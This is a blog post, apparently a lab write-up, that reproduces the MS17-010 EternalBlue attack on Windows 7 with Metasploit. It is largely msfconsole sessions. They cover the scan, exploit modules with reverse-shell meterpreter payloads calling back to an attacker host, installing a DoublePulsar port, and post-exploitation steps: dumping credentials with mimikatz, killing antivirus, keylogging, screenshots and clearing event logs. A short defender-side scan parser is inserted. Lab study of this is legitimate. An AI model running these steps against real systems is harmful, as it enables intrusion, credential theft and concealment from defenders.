ms17-010
9unk

Vulnerability reproduction environment


Target machines: Windows 7 SP1 (64-bit), Windows 7 SP1 (32-bit)

Attacking system: Kali Linux

Tool: Metasploit v5.0.8-dev

Scanning the target for the vulnerability


Use the auxiliary/scanner/smb/smb_ms17_010 module to check whether the target is vulnerable.

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.19.20
RHOSTS => 192.168.19.20
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 192.168.19.20:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.19.20:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
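As an added, defender-side example that is not part of the original post: a small Python parser for the smb_ms17_010 scanner output format shown above, which turns the hosts flagged as vulnerable into a remediation list grouped by architecture (64-bit and 32-bit hosts need different MS17-010 update packages). The scan lines, hosts, OS strings and the non-vulnerable line are constructed sample data for this example, not a real scan.

```python
import re
from collections import defaultdict

# Scanner output in the format printed by auxiliary/scanner/smb/smb_ms17_010
# (see the session above). These lines are constructed sample data; the hosts,
# OS strings and the "does NOT appear vulnerable" line are not from a real scan.
SAMPLE_SCAN = """\
[+] 192.168.19.20:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[+] 192.168.19.21:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x86 (32-bit)
[-] 192.168.19.22:445     - Host does NOT appear vulnerable
[*] 192.168.19.0/24:445   - Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
"""

# Only "[+] host:port - Host is likely VULNERABLE to MS17-010! - <OS>" lines count.
VULN_RE = re.compile(
    r"^\[\+\]\s+(?P<host>[\d.]+):(?P<port>\d+)\s+-\s+"
    r"Host is likely VULNERABLE to MS17-010!(?:\s+-\s+(?P<os>.*?))?\s*$"
)

def parse_vulnerable_hosts(text):
    """Return one record per host the scanner flagged as vulnerable."""
    findings = []
    for line in text.splitlines():
        m = VULN_RE.match(line)
        if not m:
            continue
        os_desc = m.group("os") or "unknown"
        if "(64-bit)" in os_desc:
            arch = "x64"
        elif "(32-bit)" in os_desc:
            arch = "x86"
        else:
            arch = "unknown"   # scanner ran with CHECK_ARCH false or OS string missing
        findings.append({"host": m.group("host"), "port": int(m.group("port")),
                         "os": os_desc, "arch": arch})
    return findings

def remediation_report(findings):
    """Group flagged hosts by architecture so each group can be matched with the
    right MS17-010 update (and SMBv1 disabled / TCP 445 filtered until patched)."""
    by_arch = defaultdict(list)
    for f in findings:
        by_arch[f["arch"]].append(f["host"])
    return dict(by_arch)

if __name__ == "__main__":
    report = remediation_report(parse_vulnerable_hosts(SAMPLE_SCAN))
    for arch, hosts in report.items():
        print(f"{arch}: {', '.join(hosts)}")
```

Feed it the saved output of a real scan (for example via `spool` in msfconsole) to get the list of hosts still needing the update.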

64-bit exploitation


Use the exploit/windows/smb/ms17_010_eternalblue module against the target.

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.19.20
RHOSTS => 192.168.19.20
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.19.19
lhost => 192.168.19.19
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 222
lport => 222
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

32-bit exploitation


  1. Download the exploit

# git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit && cd Eternalblue-Doublepulsar-Metasploit

  2. Edit the downloaded eternalblue_doublepulsar.rb
  • Change the path

Change /root/Eternalblue-Doublepulsar-Metasploit/deps/ to /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

  • Change the process name

The default process name is wlms.exe; changing it to explorer.exe is recommended.

(image: ms17010-1.png)

  3. Copy the file eternalblue_doublepulsar.rb and the deps directory into /usr/share/metasploit-framework/modules/exploits/windows/smb/

# cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

  4. Create /root/.wine/drive_c/

# mkdir -p /root/.wine/drive_c/

  5. Install wine

# dpkg --add-architecture i386
# apt-get update
# apt-get install lib32z1 lib32ncurses5
# apt-get install wine32
# wine cmd.exe

  6. Run the eternalblue_doublepulsar module against the target
msf5 > reload_all

msf5 > use exploit/windows/smb/eternalblue_doublepulsar

msf5 exploit(windows/smb/eternalblue_doublepulsar) > set RHOSTS 192.168.19.20
RHOSTS => 192.168.19.20

msf5 exploit(windows/smb/eternalblue_doublepulsar) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf5 exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.168.19.19
lhost => 192.168.19.19

msf5 exploit(windows/smb/eternalblue_doublepulsar) > set lport 222
lport => 222

msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit

Additional notes


(image: ms17010-2.png)

If you hit the error shown above at run time, retry a few times and check whether there is a network problem.

Post-exploitation


  1. Use mimikatz to retrieve user names and passwords from memory

meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;114889  NTLM       xxx1-PC       xxx1
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     XXX1-PC$
0;53638   NTLM
0;999     NTLM       WORKGROUP     XXX1-PC$

  2. View system information

meterpreter > sysinfo

  3. Stop antivirus software

meterpreter > run killav

  4. Show the current process ID

meterpreter > getpid

  5. Capture keystrokes

meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

  6. Take a screenshot

meterpreter > screenshot

  7. Clear the event logs

meterpreter > clearev

References


MS17-010 exploitation: https://www.jianshu.com/p/fefcdeb015be

Intranet super-weapon! Porting the MS17-010 exploit code module into Metasploit

[Exploitation] Using the EternalBlue DoublePulsar module (Eternalblue_doublepulsar) to attack a 32-bit Win 7 host

  • Title: ms17-010
  • Author: 9unk
  • Created: 2020-02-03 00:16:50
  • Link: https://9unkk.github.io/2020/02/03/ms17-010/
  • License: Unless otherwise stated, all articles on this blog are released under the BY-NC-SA license. Please credit the source when reposting!